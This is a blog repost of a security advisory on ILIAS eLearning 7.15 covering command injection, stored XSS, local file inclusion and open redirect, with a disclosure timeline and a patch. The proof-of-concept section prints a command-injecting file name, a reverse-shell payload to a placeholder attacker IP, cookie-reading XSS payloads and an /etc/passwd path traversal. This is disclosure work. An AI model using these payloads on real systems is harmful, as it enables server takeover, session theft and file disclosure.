{"id":34563,"date":"2022-12-09T19:08:10","date_gmt":"2022-12-09T16:08:10","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/170181\/SA-20221206-0.txt"},"modified":"2022-12-12T11:07:18","modified_gmt":"2022-12-12T07:37:18","slug":"ilias-elearning-7-15-command-injection-xss-lfi-open-redirect","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/ilias-elearning-7-15-command-injection-xss-lfi-open-redirect\/","title":{"rendered":"ILIAS eLearning 7.15 Command Injection \/ XSS \/ LFI \/ Open Redirect"},"content":{"rendered":"

SEC Consult Vulnerability Lab Security Advisory < 20221206-0 >
\n=======================================================================
\ntitle: Multiple critical vulnerabilities
\nproduct: ILIAS eLearning platform
\nvulnerable version: <= 7.15
\nfixed version: 7.16
\nCVE number: CVE-2022-45915, CVE-2022-45916, CVE-2022-45917,
\nCVE-2022-45918
\nimpact: critical
\nhomepage: https:\/\/www.ilias.de
\nfound: 2022-09-30
\nby: Anna Hartig (Office Bochum)
\nConstantin Schwarz (Office Bochum)
\nNiklas Schilling (Office Munich)
\nSEC Consult Vulnerability Lab<\/p>\n

An integrated part of SEC Consult, an Atos company
\nEurope | Asia | North America<\/p>\n

https:\/\/www.sec-consult.com<\/p>\n

=======================================================================<\/p>\n

Vendor description:
\n——————-
\n“Around since 1998, ILIAS is a powerful learning management system that fulfills
\nall your requirements. Using its integrated tools, small and large businesses,
\nuniversities, schools and public authorities are able to create tailored,
\nindividual learning scenarios.”<\/p>\n

Source: https:\/\/www.ilias.de\/en\/<\/p>\n

Business recommendation:
\n————————
\nThe vendor provides a patch which should be installed immediately.<\/p>\n

SEC Consult highly recommends to perform a thorough security review of the product
\nconducted by security professionals to identify and resolve potential further
\nsecurity issues.<\/p>\n

Vulnerability overview\/description:
\n———————————–
\n1) Authenticated Direct OS Command Injection – CVE-2022-45915
\nILIAS utilizes several third-party programs to perform tasks like creating PDF
\nfiles or scanning uploaded files for known viruses. These are called using the
\nPHP exec() function. In several instances, the arguments passed to the exec()
\nfunction contain user input that is not properly sanitized.
\nBy performing malicious configuration steps or uploading dangerous files, an
\nattacker can execute arbitrary system commands with the rights of the web server
\nuser (www-data).
\nThe privilege required for the different instances of command injection range
\nfrom low rights to admin rights.<\/p>\n

2) Stored Cross-Site Scripting – CVE-2022-45916
\nMultiple stored cross-site scripting vulnerabilities were identified in ILIAS
\ncourse items. These were either achieved by bypassing existing XSS filters or
\nsimply by exploiting missing input validation altogether. This results in the
\nexecution of attacker-controlled JavaScript code by the user’s browser.
\nThe attacker requires the right to create course items, e.g., as a tutor of a
\ncourse.<\/p>\n

3) Local File Inclusion – CVE-2022-45918
\nThe included SCORM editor features a debugger that gives authors insights into
\nthe current SCORM player session, as well as previous sessions. When accessing
\nthe logs of previous sessions, the debugger fails to validate the requested
\nfile path, allowing for arbitrary filesystem access.<\/p>\n

4) Open Redirect – CVE-2022-45917
\nThe function shib_logout.php redirects the user to a URL specified in the
\n“return” parameter. Since this parameter is not validated, an attacker can use
\nit to redirect a victim to an arbitrary website. This is a powerful tool in
\nphishing campaigns, as it allows hiding the malicious webpage behind a link that
\nlooks like it would take you to the real ILIAS webpage.<\/p>\n

Proof of concept:
\n—————–
\n1) Authenticated Direct OS Command Injection – CVE-2022-45915
\nMultiple instances of command injection vulnerabilities were identified:<\/p>\n

a) ZIP archive upload
\nNormal users with open assessments can submit their solution by uploading a ZIP
\narchive. These archives are extracted on the server and scanned for viruses
\nrecursively. The directory and file names can be used by an attacker to inject
\nsystem commands, e.g., by including a directory with the name
\n$(touch \/tmp\/pwned) to the ZIP archive. Exploiting this vulnerability, an attacker
\nis able to get a reverse shell on the ILIAS webserver with the rights of the
\nweb server user (www-data).<\/p>\n

b) Media object creation
\nILIAS can be configured so that users can create media objects based on files
\ninside an “Upload Directory”. Before these objects are created, the files are
\nscanned for viruses. The file names can be used by an attacker to inject system
\ncommands. By placing a file with a name like $(touch \/tmp\/pwned) inside the
\nupload directory and then creating a media object based on it, an attacker is
\nable to execute arbitrary system commands with the rights of www-data on the
\nserver.<\/p>\n

c) PDF document creation
\nILIAS provides users the functionality to export content as PDF files. A user
\nwith admin rights can configure the path to the preferred PDF renderer. An
\nattacker can use this parameter to inject system commands. Due to missing
\ninput validation it is possible to inject multiple commands. The path to
\nwkhtmltopdf has to be included in the payload, as ILIAS checks for it. By
\nchanging the path to:<\/p>\n

\/usr\/local\/bin\/wkhtmltopdf; bash -c “bash -i >& \/dev\/tcp\/<IP_Address_Attacker>\/13373 0>&1”;<\/p>\n

an attacker can open a reverse shell with the rights of www-data that connects
\nto the attacker’s machine on port 13373. The reverse shell is initiated when
\nthe export function is triggered.
\nNo PDF renderer has to be installed for this vulnerability to be exploitable.<\/p>\n

2) Stored Cross-Site Scripting – CVE-2022-45916
\nMultiple instances of stored cross-site scripting were identified:<\/p>\n

a) Several Stored XSS Attacks in Tests
\nAn attacker must be able to create new tests in which the JavaScript code will
\nbe embedded. If a victim then later accesses one of those tests, the XSS payload will
\nbe triggered. The “Question” input field of a test has a filter in place, which
\ncorrectly removes HTML tags such as <script> or
\n<img src=”x” onerror=”alert(document.cookie)”>. By making use of half open HTML
\ntags, this filter can be successfully bypassed. E.g.<\/p>\n

<img src=”x” onerror=”alert(document.cookie)”<\/p>\n

This half open HTML tag can also be used in the “Introductory Message” of a test
\nto trigger an XSS. It’s important to end the JavaScript code with a quotation
\nmark or space, to properly separate it from successive HTML tags, after it’s
\nembedded into a test.<\/p>\n

Finally, the “Question” input field of the question type “Long Menu” was
\nidentified to use no filtering at all, resulting in the unrestricted use of
\narbitrary HTML tags such as <script>.<\/p>\n

b) Stored XSS in title of course items
\nAn attacker with rights to create an arbitrary course item can conduct a stored
\nXSS attack by setting the title of the element to:<\/p>\n

” onclick=”alert(document.cookie)”<\/p>\n

When a user clicks on the button to the right of the title, the XSS payload is
\ntriggered.<\/p>\n

c) Stored XSS in HTML sites
\nAn attacker with rights to edit an HTML Learning Module can conduct a stored
\nXSS attack, as it is allowed to insert JavaScript Code to the HTML page. Even
\nif this behavior is intended, it is insecure and considered bad practice.<\/p>\n

3) Local File Inclusion – CVE-2022-45918
\nAs a prerequisite, the SCORM debugger must be enabled for the whole ILIAS
\nplatform. An attacker with access to a SCORM player can open the SCORM
\ndebugger and request the logs of a previous session. By changing the value of
\nthe “logFile” query parameter of the request, they can read arbitrary
\nfiles of the server’s filesystem. For example, to read the passwd file
\non Linux systems, an attacker can change the value of the parameter logfile
\nto “..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd”.<\/p>\n

4) Open Redirect – CVE-2022-45917
\nThe shib_logout function is vulnerable to an open redirect.
\nA URL that successfully uses this vulnerability to redirect to
\n“https:\/\/www.sec-consult.com” is:<\/p>\n

http:\/\/ILIAS-URL\/shib_logout.php?action=logout&return=https:\/\/www.sec-consult.com<\/p>\n

Vulnerable \/ tested versions:
\n—————————–
\nThe vulnerabilities were identified in ILIAS version 7.14.
\nHowever, a brief analysis of the source code suggests, that several
\nvulnerabilities are present in versions dating back to at least 3.8.4.
\nHence it is assumed that most current versions of the product are affected.<\/p>\n

The vulnerabilities were partly fixed in version 7.15, a complete patch is
\navailable with version 7.16.<\/p>\n

Vendor contact timeline:
\n————————
\n2022-10-07: Contacting vendor through security@lists.ilias.de
\n2022-10-19: Sending initial email again, as the vendor did not yet respond
\n2022-10-25: Extending email recipients to info@ilias.de, datenschutz@ilias.de and
\nidentified personal email addresses from the vendor’s website.
\n2022-10-25: Sending the advisory to the provided contact
\n2022-10-31: Vendor requests more information
\n2022-10-31: Sending detailed PoC
\n2022-11-10: Asking for current status
\n2022-11-22: Vendor confirms that patches will be available by 2022-11-26
\n2022-11-22: Asking about the version numbers of mentioned patches and CVE IDs
\n2022-11-23: Vendor provides information about patched versions; CVE IDs will be
\nrequested by SEC Consult
\n2022-11-24: Vendor releases patched version 7.16
\n2022-12-06: Public release of security advisory<\/p>\n

Solution:
\n———
\nUpdate ILIAS to version 7.16 or newer from the vendor’s website:
\nhttps:\/\/docu.ilias.de\/goto.php?target=st_229<\/p>\n

Workaround:
\n———–
\nNone<\/p>\n

Advisory URL:
\n————-
\nhttps:\/\/sec-consult.com\/vulnerability-lab\/<\/p>\n

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n

SEC Consult Vulnerability Lab<\/p>\n

SEC Consult, an Atos company
\nEurope | Asia | North America<\/p>\n

About SEC Consult Vulnerability Lab
\nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
\nAtos company. It ensures the continued knowledge gain of SEC Consult in the
\nfield of network and application security to stay ahead of the attacker. The
\nSEC Consult Vulnerability Lab supports high-quality penetration testing and
\nthe evaluation of new offensive and defensive technologies for our customers.
\nHence our customers obtain the most current information about vulnerabilities
\nand valid recommendation about the risk profile of new technologies.<\/p>\n

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\nInterested to work with the experts of SEC Consult?
\nSend us your application https:\/\/sec-consult.com\/career\/<\/p>\n

Interested in improving your cyber security with the experts of SEC Consult?
\nContact our local offices https:\/\/sec-consult.com\/contact\/
\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<\/p>\n

Mail: security-research at sec-consult dot com
\nWeb: https:\/\/www.sec-consult.com
\nBlog: http:\/\/blog.sec-consult.com
\nTwitter: https:\/\/twitter.com\/sec_consult<\/p>\n

EOF A. Hartig, C. Schwarz, N. Schilling \/ @2022<\/p>\n","protected":false},"excerpt":{"rendered":"

SEC Consult Vulnerability Lab Security Advisory < 20221206-0 > ======================================================================= title: Multiple critical vulnerabilities product: ILIAS eLearning platform vulnerable version: <= 7.15 fixed version: 7.16 CVE number: CVE-2022-45915, CVE-2022-45916, CVE-2022-45917, CVE-2022-45918 impact: critical homepage: https:\/\/www.ilias.de found: 2022-09-30 by: Anna Hartig (Office Bochum) Constantin Schwarz (Office Bochum) Niklas Schilling (Office Munich) SEC Consult Vulnerability Lab An …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-34563","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34563","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=34563"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34563\/revisions"}],"predecessor-version":[{"id":34742,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/34563\/revisions\/34742"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=34563"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=34563"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=34563"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}